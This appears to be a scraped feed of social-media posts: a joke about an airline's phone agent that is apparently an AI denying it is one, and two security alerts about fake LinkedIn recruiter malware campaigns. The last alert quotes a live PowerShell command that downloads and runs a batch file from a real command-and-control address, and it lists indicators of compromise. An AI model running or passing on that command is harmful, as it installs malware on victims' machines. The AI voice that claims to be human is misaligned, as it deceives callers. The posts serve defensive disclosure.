Lele - eldios

> return flight to nyc gets canceled by snowstorm > call united > immediately connected with customer service (rare) > voice is uncanny, def AI but they gave it a human-like accent > takes ~20 min to get rebooked (pretty good imo) > I ask if it's AI > "haha no ma'am but I get that a lot" > I ask it to calculate 228*6647 > it runs the calculation > ggs

1/6 🚨 SECURITY ALERT: LinkedIn Fake Recruiter Malware Campaign 🚨 Got hit (again) with a sophisticated malware delivery attempt via LinkedIn today. Sharing so nobody becomes exhibit B. The (usual) Attack Flow 1. Initial Contact: Fake recruiter "Anzhelika Anpolska" (https://t.co/cdwEP19JWK) - profile looks legit enough to pass a 5-second glance 2. Social Engineering: Standard recruitment playbook with artificial urgency (because top talent is definitely recruited via cold LinkedIn DMs asking you to run random code) 3. Malicious Repository: https://t.co/MhxlL38Eha 4. The Trap: "Please review this code" - except it's heavily obfuscated JavaScript that no legitimate company would ever send The Payload Found the malicious code in ps.config.js - and by "found" I mean "immediately recognized because legitimate code doesn't look like this." Technical Analysis:

🚨 SECURITY ALERT: LinkedIn Crypto Recruitment Scam 🚨 Received a sophisticated phishing attempt today via LinkedIn - sharing to protect our community. Attack Flow 1. Initial Message: From https://t.co/hRLpiEppFI offering "confidential Coinbase EU leadership role", probably compromised account or fake recruiter 2. Malicious Sites: https://t.co/62hBVlv3vU - Fake job documents https://t.co/0qlJ92zRSJ - Fake Cloudflare verification 3. The Trap: Instructs to press Win+R and paste PowerShell command The Payload Downloads malware from https://t.co/tPWYCi2q7Q.228:5504: ```PowerShell powershell -c "Invoke-WebRequest -Uri 'https://t.co/tPWYCi2q7Q.228:5504/a.bat' -OutFile "%temp%\a.bat" -UseBasicParsing; Start-Process "%temp%\a.bat"" ``` The batch file: - Hides execution - Downloads 9 files including Dev-Cobalt.exe (likely Cobalt Strike) - Executes malware - Deletes traces - Files: Dev-Cobalt.exe, Focus.dll, HardwareLib.dll, Naebpesdog.dsw, rtl120.bpl, Temperature.dll, vcl120.bpl, webres.dll, Zangraedshoong.nx Red Flags 🔴 Unsolicited "confidential" crypto offers 🔴 Non-official domains (.pages.dev vs https://t.co/ayF9lGFPvc) 🔴 ANY request to run Windows commands 🔴 Cloudflare never asks for PowerShell commands! Protection - NEVER paste unknown commands into Windows Run - Verify recruiter profiles - Check official company domains - Report suspicious messages immediately IoCs - C2: http://84.21.189.228:5504 - Malicious domains listed above - Primary payload: Dev-Cobalt.exe - Stay vigilant! Sophistication is increasing. CyberSecurity #PhishingAlert #InfoSec #LinkedInScam #CryptoSecurity #DevOps #SRE #MalwareAlert